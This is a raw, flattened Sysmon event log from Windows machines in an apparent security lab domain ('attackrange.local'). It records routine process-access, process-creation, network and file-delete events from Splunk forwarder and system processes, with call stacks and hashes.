08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.210{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B7-60EB-EE79-00000000D001}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.211{0C1E0330-F8B7-60EB-EE79-00000000D001}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x8000000000000000810728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.742{0C1E0330-F8B8-60EB-F079-00000000D001}37764008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000810727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.219{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57485-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000810726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B8-60EB-F079-00000000D001}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F8B8-60EB-F079-00000000D001}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B8-60EB-F079-00000000D001}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.586{0C1E0330-F8B8-60EB-F079-00000000D001}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.523{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD405E99DBF4A18C2344BBFB03E1D79,SHA256=7DCBBDBDEE9634642BBED8014E19284B92B8A292F15E83B41D8C274DFAD3EE03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:28.105{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03D9EC858355A807BAA4E4CA2F914EE5,SHA256=40E93250A73BFE951916065F045EE9E3A9690A9DD885AB930250F13C4F2C9142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC86A9BF743B7D69F93BB415B2821339,SHA256=ABC4FB4A000A1AB73A9665C982C08973A0E41BB06E8A54A7F8E8F7D480C09614,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.039{0C1E0330-F8B7-60EB-EF79-00000000D001}37442660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:29.601{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67DEB028ACEB0F1C45F006B82F47F7BE,SHA256=D7966E10B7D8A8E8F67800CAD7352F2FB11B4601C9210A3DE036D52E6193A738,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:29.539{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C40F1CD9D2DA207F5F2AB5FAB19DB7DE,SHA256=41FA1789CCD7D6F55CB91BA5FA524FF096CD4E0A92A21FF22F8CB518B06B5D20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:29.121{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919826E4973B337CB1F6993DFF7B309E,SHA256=C7004F185D99483A8A18D495092D3C2E528469A10C807F4FDC0ADE375A6520D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:30.554{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653F6DD4D9BAE48CEAEFF19D378CBAF2,SHA256=AD25EE639CEEF481A3E0651DB3B067041C68C573B839385D08B2DA44E3A1C897,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:21.711{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61997-false10.0.1.12-8000- 23542300x80000000000000001055280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:30.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56DF4BB7F8CBF7A3550F2947F27878E8,SHA256=8E0224E5F8ACE03D81805CC57CE4D76230A166630EFA1168CC060558A579D42F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:30.226{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=633BC04BD26EDE8A2FAA54B1BBFC8FC6,SHA256=915FA374AEF8FCDAE880956A62D2AC6659632F29187A03F127D15385AFB11D5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 